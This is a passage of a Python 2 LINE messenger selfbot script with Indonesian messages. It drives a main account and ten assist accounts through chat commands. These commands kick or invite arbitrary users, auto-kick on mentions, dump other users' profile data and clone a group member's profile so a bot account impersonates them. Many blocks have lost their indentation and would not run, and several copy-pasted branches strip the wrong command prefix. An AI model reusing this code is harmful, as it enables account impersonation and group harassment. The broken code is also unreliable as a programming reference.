                            cl.findAndAddContactsByMid(target)
                            cl.inviteIntoGroup(msg.to,[target])
                            cl.sendText(msg.to,"Done Invite : \n➡" + _name)
                            wait["invite"] = False
                            break
                        except:
                            try:
                                cl.findAndAddContactsByMid(invite)
                                cl.inviteIntoGroup(op.param1,[invite])
                                wait["invite"] = False
                            except:
                                cl.sendText(msg.to,"Negative, Error detected")
                                wait["invite"] = False
                            break
# Sticker inspector: when "sticker" is armed, reply with the incoming
# sticker's IDs and its shop link.
if msg.contentType == 7:
    if wait["sticker"] == True:
        msg.contentType = 0
        stk_id = msg.contentMetadata['STKID']
        stk_ver = msg.contentMetadata['STKVER']
        pkg_id = msg.contentMetadata['STKPKGID']
        filler = "『 Sticker Check 』\nSTKID : %s\nSTKPKGID : %s\nSTKVER : %s\n『 Link 』\nline://shop/detail/%s" % (stk_id,pkg_id,stk_ver,pkg_id)
        cl.sendText(msg.to, filler)
        #wait["sticker"] = False
    else:
        pass
# Auto read-receipt: mark the chat as read (1:1 chats key on the sender).
if wait["alwaysRead"] == True:
    if msg.toType == 0:
        cl.sendChatChecked(msg.from_,msg.id)
    else:
        cl.sendChatChecked(msg.to,msg.id)
# Contact-card (contentType 13) modes: pending flags decide whether the shared
# mid is added to / removed from the comment blacklist or main blacklist, or
# (contact mode) dumped as a full profile summary.
if msg.contentType == 13:
    if wait["wblack"] == True:
        if msg.contentMetadata["mid"] in wait["commentBlack"]:
            cl.sendText(msg.to,"sudah masuk daftar hitam👈")
            wait["wblack"] = False
        else:
            wait["commentBlack"][msg.contentMetadata["mid"]] = True
            wait["wblack"] = False
            cl.sendText(msg.to,"Itu tidak berkomentar👈")
    elif wait["dblack"] == True:
        if msg.contentMetadata["mid"] in wait["commentBlack"]:
            del wait["commentBlack"][msg.contentMetadata["mid"]]
            cl.sendText(msg.to,"Done")
            wait["dblack"] = False
        else:
            wait["dblack"] = False
            cl.sendText(msg.to,"Tidak ada dalam daftar hitam👈")
    elif wait["wblacklist"] == True:
        if msg.contentMetadata["mid"] in wait["blacklist"]:
            cl.sendText(msg.to,"sudah masuk daftar hitam")
            wait["wblacklist"] = False
        else:
            wait["blacklist"][msg.contentMetadata["mid"]] = True
            wait["wblacklist"] = False
            cl.sendText(msg.to,"Done👈")
    elif wait["dblacklist"] == True:
        if msg.contentMetadata["mid"] in wait["blacklist"]:
            del wait["blacklist"][msg.contentMetadata["mid"]]
            cl.sendText(msg.to,"Done👈")
            wait["dblacklist"] = False
        else:
            wait["dblacklist"] = False
            cl.sendText(msg.to,"Done👈")
    elif wait["contact"] == True:
        # Contact mode: echo the mid, then a profile dump (name, status,
        # avatar URL, cover URL when the channel API yields one).
        msg.contentType = 0
        cl.sendText(msg.to,msg.contentMetadata["mid"])
        if 'displayName' in msg.contentMetadata:
            contact = cl.getContact(msg.contentMetadata["mid"])
            try:
                cu = cl.channel.getCover(msg.contentMetadata["mid"])
            except:
                cu = ""
            cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
        else:
            contact = cl.getContact(msg.contentMetadata["mid"])
            try:
                cu = cl.channel.getCover(msg.contentMetadata["mid"])
            except:
                cu = ""
            cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
# Shared timeline post (contentType 16): when Timeline mode is on, echo the
# post URL — once via ki, once via cl (wording depends on the language flag).
elif msg.contentType == 16:
    if wait["Timeline"] == True:
        msg.contentType = 0
        msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
        ki.sendText(msg.to,msg.text)
        msg.contentType = 0
        if wait["lang"] == "JP":
            msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
        else:
            msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
        cl.sendText(msg.to,msg.text)
# No text to match against: stop processing this message.
elif msg.text is None:
    return
# Admin-only help output.
elif msg.text in ["Kasih help","help","[∆√ cувєя тк™ √∆]"]:
    if msg.from_ in admin:
        cl.sendText(msg.to,helpMessage)
        cl.sendText(msg.to,"『Dilarang Typo Tanpa Izin Dari Owner』")
# NOTE(review): "help" and the decorated trigger also appear in the branch
# above, so for those two texts this branch is unreachable.
elif msg.text in ["Ryan key","help","[∆√ cувєя тк™ √∆]"]:
    if msg.from_ in admin:
        cl.sendText(msg.to,ryanMessage)
        msg.contentType = 13
        msg.contentMetadata = {'mid': admsa}
        cl.sendMessage(msg)
# Mention auto-respond mode toggles: the modes are mutually exclusive, so
# turning one on clears the other four flags.
elif msg.text in ["Respon1 on"]:
    if msg.from_ in admin:
        wait["detectMention"] = True
        wait["detectMention2"] = False
        wait["detectMention3"] = False
        wait["detectMention4"] = False
        wait["kickMention"] = False
        ki.sendText(msg.to,"Auto Respon1 Sudah Aktif")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon1 off"]:
    if msg.from_ in admin:
        wait["detectMention"] = False
        ki.sendText(msg.to,"Auto Respon1 Sudah Off")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon2 on"]:
    if msg.from_ in admin:
        wait["detectMention"] = False
        wait["detectMention2"] = True
        wait["detectMention3"] = False
        wait["detectMention4"] = False
        wait["kickMention"] = False
        cl.sendText(msg.to,"Auto Respon2 Sudah Aktif")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon2 off"]:
    if msg.from_ in admin:
        wait["detectMention2"] = False
        cl.sendText(msg.to,"Auto Respon2 Sudah Off")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon3 on"]:
    if msg.from_ in admin:
        wait["detectMention"] = False
        wait["detectMention2"] = False
        wait["detectMention3"] = True
        wait["detectMention4"] = False
        wait["kickMention"] = False
        cl.sendText(msg.to,"Auto Respon3 Sudah Aktif")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon3 off"]:
    if msg.from_ in admin:
        wait["detectMention3"] = False
        cl.sendText(msg.to,"Auto Respon3 Sudah Off")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon4 on"]:
    if msg.from_ in admin:
        wait["detectMention"] = False
        wait["detectMention2"] = False
        wait["detectMention3"] = False
        wait["detectMention4"] = True
        wait["kickMention"] = False
        cl.sendText(msg.to,"Auto Respon4 Sudah Aktif")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Respon4 off"]:
    if msg.from_ in admin:
        wait["detectMention4"] = False
        cl.sendText(msg.to,"Auto Respon4 Sudah Off")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Responkick on"]:
    if msg.from_ in admin:
        wait["kickMention"] = True
        wait["detectMention"] = False
        wait["detectMention2"] = False
        wait["detectMention3"] = False
        wait["detectMention4"] = False
        cl.sendText(msg.to,"Auto Respon Kick Sudah Aktif")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["Responkick off"]:
    if msg.from_ in admin:
        wait["kickMention"] = False
        cl.sendText(msg.to,"Auto Respon Kick Di Nonaktifkan")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
# Bulk toggles: arm or clear every respond mode at once.
elif msg.text in ["AllRespon on"]:
    if msg.from_ in admin:
        wait["detectMention"] = True
        wait["detectMention2"] = True
        wait["detectMention3"] = True
        wait["detectMention4"] = True
        wait["kickMention"] = True
        cl.sendText(msg.to,"Semua Auto Respon Sudah Aktif")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
elif msg.text in ["AllRespon off"]:
    if msg.from_ in admin:
        wait["detectMention"] = False
        wait["detectMention2"] = False
        wait["detectMention3"] = False
        wait["detectMention4"] = False
        wait["kickMention"] = False
        cl.sendText(msg.to,"Semua Auto Respon Sudah Nonaktif")
    else:
        ki.sendText(msg.to,"Khusus Ryan")
# Arm/disarm the contact-card invite mode handled at op.type 25 above.
elif msg.text in ["Bot:inv on"]:
    if msg.from_ in admin:
        wait["winvite"] = True
        ki.sendText(msg.to,"Bot Invite : Enable")
elif msg.text in ["Bot:inv off"]:
    if msg.from_ in admin:
        wait["winvite"] = False
        ki.sendText(msg.to,"Bot Invite : Disable")
# Contact-dump mode toggle (no admin gate).
elif msg.text in ["K on","Contact on"]:
    wait["contact"] = True
    cl.sendText(msg.to,"Contact Sudah Aktif")
elif msg.text in ["K off","Contact off"]:
    wait["contact"] = False
    cl.sendText(msg.to,"Contact Sudah Di Nonaktifkan")
elif msg.text in ["Alwaysread on"]:
    wait["alwaysRead"] = True
    cl.sendText(msg.to,"Always Read Sudah Aktif")
elif msg.text in ["Alwaysread off"]:
    wait["alwaysRead"] = False
    cl.sendText(msg.to,"Always Read Sudah Di Nonaktifkan")
# Rename the group: "Gn:<name>" goes through ki, "Gn <name>" through cl.
elif ("Gn:" in msg.text):
    if msg.toType == 2:
        group = cl.getGroup(msg.to)
        group.name = msg.text.replace("Gn:","")
        ki.updateGroup(group)
    else:
        cl.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok👈")
elif ("Gn " in msg.text):
    if msg.toType == 2:
        group = cl.getGroup(msg.to)
        group.name = msg.text.replace("Gn ","")
        cl.updateGroup(group)
    else:
        cl.sendText(msg.to,"Can not be used for groups other than")
# Report the id of the newest timeline post.
elif msg.text in ["timeline"]:
    try:
        url = cl.activity(limit=5)
        cl.sendText(msg.to,url['result']['posts'][0]['postInfo']['postId'])
    except Exception as E:
        print E
# Kick / invite a raw mid given inline in the command text.
elif "Kick:" in msg.text:
    midd = msg.text.replace("Kick:","")
    cl.kickoutFromGroup(msg.to,[midd])
elif "Invite:" in msg.text:
    midd = msg.text.replace("Invite:","")
    ki.findAndAddContactsByMid(midd)
    ki.inviteIntoGroup(msg.to,[midd])
# "Bots": post the contact card of every assist bot (ki..ki10) in turn.
# NOTE(review): time.sleep(0.0) is a no-op delay.
elif "Bots" == msg.text:
    msg.contentType = 13
    msg.contentMetadata = {'mid': kimid}
    cl.sendMessage(msg)
    time.sleep(0.0)
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki2mid}
    cl.sendMessage(msg)
    time.sleep(0.0)
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki3mid}
    cl.sendMessage(msg)
    time.sleep(0.0)
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki4mid}
    cl.sendMessage(msg)
    time.sleep(0.0)
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki5mid}
    cl.sendMessage(msg)
    time.sleep(0.0)
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki6mid}
    cl.sendMessage(msg)
    time.sleep(0.0)
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki7mid}
    cl.sendMessage(msg)
    time.sleep(0.0)
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki8mid}
    cl.sendMessage(msg)
    time.sleep(0.0)
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki9mid}
    cl.sendMessage(msg)
    time.sleep(0.0)
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki10mid}
    cl.sendMessage(msg)
    time.sleep(0.0)
    msg.contentType = 13
# "ReyN": the Nth assist bot posts its own contact card.
elif "Rey1" == msg.text:
    msg.contentType = 13
    msg.contentMetadata = {'mid': kimid}
    ki.sendMessage(msg)
elif "Rey2" == msg.text:
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki2mid}
    ki2.sendMessage(msg)
elif "Rey3" == msg.text:
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki3mid}
    ki3.sendMessage(msg)
elif "Rey4" == msg.text:
    msg.contentType = 13
    msg.contentMetadata = {'mid': ki4mid}
    ki4.sendMessage(msg)
# Translate the remainder of the message via googletrans Translator;
# destination language is fixed per command (id / en / th).
elif "Tr-id " in msg.text:
    isi = msg.text.replace("Tr-id ","")
    translator = Translator()
    hasil = translator.translate(isi, dest='id')
    A = hasil.text
    A = A.encode('utf-8')
    cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
    isi = msg.text.replace("Tr-en ","")
    translator = Translator()
    hasil = translator.translate(isi, dest='en')
    A = hasil.text
    A = A.encode('utf-8')
    cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
    isi = msg.text.replace("Tr-th ","")
    translator = Translator()
    hasil = translator.translate(isi, dest='th')
    A = hasil.text
    A = A.encode('utf-8')
    cl.sendText(msg.to, A)
# Translate by scraping Google Translate's mobile page: fetch the page with a
# browser User-Agent and cut the result out of the 'class="t0">' span.
elif "Id@en" in msg.text:
    bahasa_awal = 'id'
    bahasa_tujuan = 'en'
    kata = msg.text.replace("Id@en ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Inggris----\n" + "" + result)
elif "En@id" in msg.text:
    bahasa_awal = 'en'
    bahasa_tujuan = 'id'
    kata = msg.text.replace("En@id ","")
    url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
    agent = {'User-Agent':'Mozilla/5.0'}
    cari_hasil = 'class="t0">'
    request = urllib2.Request(url, headers=agent)
    page = urllib2.urlopen(request).read()
    result = page[page.find(cari_hasil)+len(cari_hasil):]
    result = result.split("<")[0]
    cl.sendText(msg.to,"----Dari Inggris----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Thailand----\n" + "" + result)
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Thailand----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
# "Fancytext": send the remainder of the message via the client's flashing
# text helper.
elif "Fancytext " in msg.text:
    txt = msg.text.replace("Fancytext ", "")
    cl.kedapkedip(msg.to,txt)
    print "[Command] Kedapkedip"
# Gift commands: send a LINE theme gift message (contentType 9) from the
# selected bot account; only the MSGTPL template number differs.
elif msg.text in ["Rey1 Gift","Bot1 gift"]:
    msg.contentType = 9
    msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
    'PRDTYPE': 'THEME',
    'MSGTPL': '2'}
    msg.text = None
    ki.sendMessage(msg)
elif msg.text in ["Gift","gift"]:
    msg.contentType = 9
    msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
    'PRDTYPE': 'THEME',
    'MSGTPL': '3'}
    msg.text = None
    cl.sendMessage(msg)
elif msg.text in ["Rey2 Gift","Bot2 gift"]:
    msg.contentType = 9
    msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
    'PRDTYPE': 'THEME',
    'MSGTPL': '3'}
    msg.text = None
    ki2.sendMessage(msg)
elif msg.text in ["Rey3 Gift","Bot3 gift"]:
    msg.contentType = 9
    msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
    'PRDTYPE': 'THEME',
    'MSGTPL': '3'}
    msg.text = None
    ki3.sendMessage(msg)
elif msg.text in ["Rey4 Gift","Bot4 gift"]:
    msg.contentType = 9
    msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
    'PRDTYPE': 'THEME',
    'MSGTPL': '3'}
    msg.text = None
    ki4.sendMessage(msg)
# Toggle the timeline auto-like mode.
elif msg.text in ["Auto like"]:
    wait["likeOn"] = True
    cl.sendText(msg.to,"『Auto Like DiAktifkan』")
elif msg.text in ["Like off"]:
    wait["likeOn"] = False
    cl.sendText(msg.to,"『Auto Like Di Nonaktifkan』")
# Cancel all pending group invitations (ki variant, then cl variant).
elif msg.text in ["Rey Cancel","Cancel dong","B cancel"]:
    if msg.toType == 2:
        group = ki.getGroup(msg.to)
        if group.invitee is not None:
            gInviMids = [contact.mid for contact in group.invitee]
            ki.cancelGroupInvitation(msg.to, gInviMids)
        else:
            if wait["lang"] == "JP":
                ki.sendText(msg.to,"Davet yok😤")
            else:
                ki.sendText(msg.to,"Invite people inside not👈")
    else:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Tidak ada undangan")
        else:
            ki.sendText(msg.to,"invitan tidak ada")
elif msg.text in ["Cancel","cancel"]:
    if msg.toType == 2:
        group = cl.getGroup(msg.to)
        if group.invitee is not None:
            gInviMids = [contact.mid for contact in group.invitee]
            cl.cancelGroupInvitation(msg.to, gInviMids)
        else:
            if wait["lang"] == "JP":
                ki.sendText(msg.to,"No is Invite✍😤")
            else:
                ki.sendText(msg.to,"Invite people inside not👈")
    else:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Tidak ada undangan👈")
        else:
            ki.sendText(msg.to,"invitan tidak ada")
# Debug: dump the group object to stdout and echo the message back.
elif "gurl" == msg.text:
    print cl.getGroup(msg.to)
    cl.sendMessage(msg)
elif "rey gurl" == msg.text:
    print ki.getGroup(msg.to)
    ki.sendMessage(msg)
# Open the group's join-by-ticket URL; every assist bot announces it.
elif msg.text in ["Link on"]:
    if msg.toType == 2:
        group = ki.getGroup(msg.to)
        group.preventJoinByTicket = False
        ki.updateGroup(group)
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"URL on ✍")
            ki2.sendText(msg.to,"URL on ✍")
            ki3.sendText(msg.to,"URL on ✍")
            ki4.sendText(msg.to,"URL on ✍")
            ki5.sendText(msg.to,"URL on ✍")
            ki6.sendText(msg.to,"URL on ✍")
            ki7.sendText(msg.to,"URL on ✍")
            ki8.sendText(msg.to,"URL on ✍")
            ki9.sendText(msg.to,"URL on ✍")
            ki10.sendText(msg.to,"URL on ✍")
    else:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"It can not be used outside the group ô€œô€„‰👈")
        else:
            ki.sendText(msg.to,"Can not be used for groups other than ô€œô€„‰")
# Close the join-by-ticket URL.
elif msg.text in ["Link off"]:
    if msg.toType == 2:
        group = ki.getGroup(msg.to)
        group.preventJoinByTicket = True
        ki.updateGroup(group)
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"URL Closed ✍")
            ki2.sendText(msg.to,"URL Closed ✍")
            ki3.sendText(msg.to,"URL Closed ✍")
            ki4.sendText(msg.to,"URL Closed ✍")
            ki5.sendText(msg.to,"URL Closed ✍")
            ki6.sendText(msg.to,"URL Closed ✍")
            ki7.sendText(msg.to,"URL Closed ✍")
            ki8.sendText(msg.to,"URL Closed ✍")
            ki9.sendText(msg.to,"URL Closed ✍")
            ki10.sendText(msg.to,"URL Closed ✍")
        else:
            ki.sendText(msg.to,"URL Kapalí ✍")
            ki2.sendText(msg.to,"URL Kapalí ✍")
            ki3.sendText(msg.to,"URL Kapali ✍")
            ki4.sendText(msg.to,"URL Kapali ✍")
            ki5.sendText(msg.to,"URL Kapali ✍")
            ki6.sendText(msg.to,"URL Kapali ✍")
            ki7.sendText(msg.to,"URL Kapali ✍")
    else:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"It can not be used outside the group 👈")
        else:
            cl.sendText(msg.to,"Can not be used for groups other than ô€œ")
# "Ginfo": summarize the group (name, id, creator, member/invite counts) and
# post the creator's contact card.
elif "Ginfo" == msg.text:
    ginfo = ki.getGroup(msg.to)
    try:
        gCreator = ginfo.creator.displayName
    except:
        gCreator = "Error"
    if wait["lang"] == "JP":
        if ginfo.invitee is None:
            sinvitee = "0"
        else:
            sinvitee = str(len(ginfo.invitee))
        msg.contentType = 13
        msg.contentMetadata = {'mid': ginfo.creator.mid}
        ki.sendText(msg.to,"[Nama]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nAnggota:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
        ki.sendMessage(msg)
# Post the current chat's id as a contact card.
elif "Contact" == msg.text:
    msg.contentType = 13
    msg.contentMetadata = {'mid': msg.to}
    cl.sendMessage(msg)
# mid report commands: each account sends its own mid as text.
elif "Mymid" == msg.text:
    cl.sendText(msg.to,mid)
elif "Rey1 mid" == msg.text:
    ki.sendText(msg.to,kimid)
elif "Rey2 mid" == msg.text:
    ki2.sendText(msg.to,ki2mid)
elif "Rey3 mid" == msg.text:
    ki3.sendText(msg.to,ki3mid)
elif "Rey4 mid" == msg.text:
    ki4.sendText(msg.to,ki4mid)
elif "Rey5 mid" == msg.text:
    ki5.sendText(msg.to,ki5mid)
elif "Rey6 mid" == msg.text:
    ki6.sendText(msg.to,ki6mid)
elif "Rey7 mid" == msg.text:
    ki7.sendText(msg.to,ki7mid)
elif "Rey8 mid" == msg.text:
    ki8.sendText(msg.to,ki8mid)
elif "Rey9 mid" == msg.text:
    ki9.sendText(msg.to,ki9mid)
elif "Rey10 mid" == msg.text:
    ki10.sendText(msg.to,ki10mid)
elif "all mid" == msg.text:
    ki.sendText(msg.to,kimid)
    ki2.sendText(msg.to,ki2mid)
    ki3.sendText(msg.to,ki3mid)
    ki4.sendText(msg.to,ki4mid)
    ki5.sendText(msg.to,ki5mid)
    ki6.sendText(msg.to,ki6mid)
    ki7.sendText(msg.to,ki7mid)
    ki8.sendText(msg.to,ki8mid)
    ki9.sendText(msg.to,ki9mid)
    ki10.sendText(msg.to,ki10mid)
# "Rey:<text>": create a timeline post with the text and reply with its URL.
elif "Rey:" in msg.text:
    tl_text = msg.text.replace("Rey:","")
    cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
# Profile updates; LINE caps display names at 20 chars and bios at 500.
elif "All:" in msg.text:
    string = msg.text.replace("All:","")
    if len(string.decode('utf-8')) <= 20:
        profile = ki.getProfile()
        profile.displayName = string
        ki.updateProfile(profile)
elif "Allbio:" in msg.text:
    string = msg.text.replace("Allbio:","")
    if len(string.decode('utf-8')) <= 500:
        profile = ki.getProfile()
        profile.statusMessage = string
        ki.updateProfile(profile)
elif "Mybio " in msg.text:
    string = msg.text.replace("Mybio ","")
    if len(string.decode('utf-8')) <= 500:
        profile = cl.getProfile()
        profile.statusMessage = string
        cl.updateProfile(profile)
        cl.sendText(msg.to,"Done")
elif "Myname:" in msg.text:
    string = msg.text.replace("Myname:","")
    if len(string.decode('utf-8')) <= 20:
        profile = cl.getProfile()
        profile.displayName = string
        cl.updateProfile(profile)
        cl.sendText(msg.to,"Update Names👉 " + string + "👈")
elif "Rey1 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey1 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki.CloneContactProfile(target)
ki.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey2 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey2 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki2.CloneContactProfile(target)
ki2.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey3 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey3 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki3.CloneContactProfile(target)
ki3.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey4 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey4 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki4.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki4.CloneContactProfile(target)
ki4.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey5 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey5 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki5.CloneContactProfile(target)
ki5.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey6 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey6 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki6.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki6.CloneContactProfile(target)
ki6.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey7 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey7 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki7.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki7.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki7.CloneContactProfile(target)
ki7.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey8 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey8 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki8.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki8.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki8.CloneContactProfile(target)
ki8.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey9 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey9 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki9.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki9.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki9.CloneContactProfile(target)
ki9.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
elif "Rey10 copy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Rey10 copy @","")
_nametarget = _name.rstrip(' ')
gs = ki10.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki10.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki10.CloneContactProfile(target)
ki10.sendText(msg.to, "Copied (^_^)")
except Exception as e:
print e
# "Backup all": restore every assist bot's avatar and profile from the
# backupN snapshots; reports the failure text on any error.
elif msg.text in ["Backup all"]:
    try:
        ki.updateDisplayPicture(backup1.pictureStatus)
        ki.updateProfile(backup1)
        ki2.updateDisplayPicture(backup2.pictureStatus)
        ki2.updateProfile(backup2)
        ki3.updateDisplayPicture(backup3.pictureStatus)
        ki3.updateProfile(backup3)
        ki4.updateDisplayPicture(backup4.pictureStatus)
        ki4.updateProfile(backup4)
        ki5.updateDisplayPicture(backup5.pictureStatus)
        ki5.updateProfile(backup5)
        ki6.updateDisplayPicture(backup6.pictureStatus)
        ki6.updateProfile(backup6)
        ki7.updateDisplayPicture(backup7.pictureStatus)
        ki7.updateProfile(backup7)
        ki8.updateDisplayPicture(backup8.pictureStatus)
        ki8.updateProfile(backup8)
        ki9.updateDisplayPicture(backup9.pictureStatus)
        ki9.updateProfile(backup9)
        ki10.updateDisplayPicture(backup10.pictureStatus)
        ki10.updateProfile(backup10)
        cl.sendText(msg.to, "All Done (^_^)")
    except Exception as e:
        cl.sendText(msg.to, str(e))
#-------------Tag All start---------------#
# Mention every group member in one message: build the MENTIONEES metadata by
# hand, pairing each member mid with a "@nrik \n" placeholder slot (7 chars
# per entry: start offset strt, end offset akh).
elif msg.text in ["Cipok","Rey Tagall"]:
    group = cl.getGroup(msg.to)
